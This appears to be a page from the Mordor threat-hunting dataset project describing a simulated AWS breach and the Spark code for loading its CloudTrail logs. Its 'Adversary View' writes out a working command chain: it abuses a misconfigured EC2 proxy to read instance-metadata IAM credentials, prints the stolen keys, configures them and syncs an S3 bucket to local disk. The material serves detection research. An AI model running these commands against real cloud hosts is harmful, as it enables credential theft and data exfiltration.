AWS Cloud Bank Breach S3¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2020/09/13 |
Modification Date |
2020/09/13 |
Tactics |
|
Techniques |
|
Tags |
[‘EC2 Proxy Abuse’, ‘S3 Data Exfiltration’] |
Dataset Description¶
This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.
Datasets Downloads¶
Dataset Type |
Link |
---|---|
cloud |
Simulation Plan¶
Environment |
Tool Type |
Module |
---|---|---|
https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3 |
Cloud Formation Templates |
Adversary View¶
> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H "Host:169.254.169.254"
MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 >
> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H "Host:169.254.169.254"
{
"Code" : "Success",
"LastUpdated" : "2020-09-14T00:49:26Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIA5FLZVX4OPVKKVBMX",
"SecretAccessKey" : "aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03",
"Token" : "TOKEN",
"Expiration" : "2020-09-14T07:10:27Z"
}
> aws configure --profile erratic
AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX
AWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03
Default region name [None]: us-east-1
Default output format [None]: json
> echo aws_session_token = "TOKEN" >> ~/.aws/credentials
> aws s3 ls --profile erratic
2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642
2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a
> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26 89 ring.txt
> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26 89 ring.txt
> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic
download: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/aws/collection/ec2_proxy_s3_exfiltration.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT *
FROM mordorTable
'''
)
df.show(1, vertical=True)
-RECORD 0-----------------------------------
@timestamp | 2020-09-13 20:44:23
@version | 1
additionalEventData | null
apiVersion | null
awsRegion | us-east-1
eventCategory | null
eventID | fd4f1042-c7f6-410...
eventName | DescribeInstanceT...
eventSource | ec2.amazonaws.com
eventType | AwsApiCall
eventVersion | 1.05
managementEvent | null
readOnly | null
recipientAccountId | 123456789123
requestID | 2db6a7b5-876c-499...
requestParameters | [,, [100, AAIAAUC...
resources | null
responseElements | null
sharedEventID | null
sourceIPAddress | 1.2.3.4
userAgent | console.ec2.amazo...
userIdentity | [ASIA5FLZVX4OI4ZD...
only showing top 1 row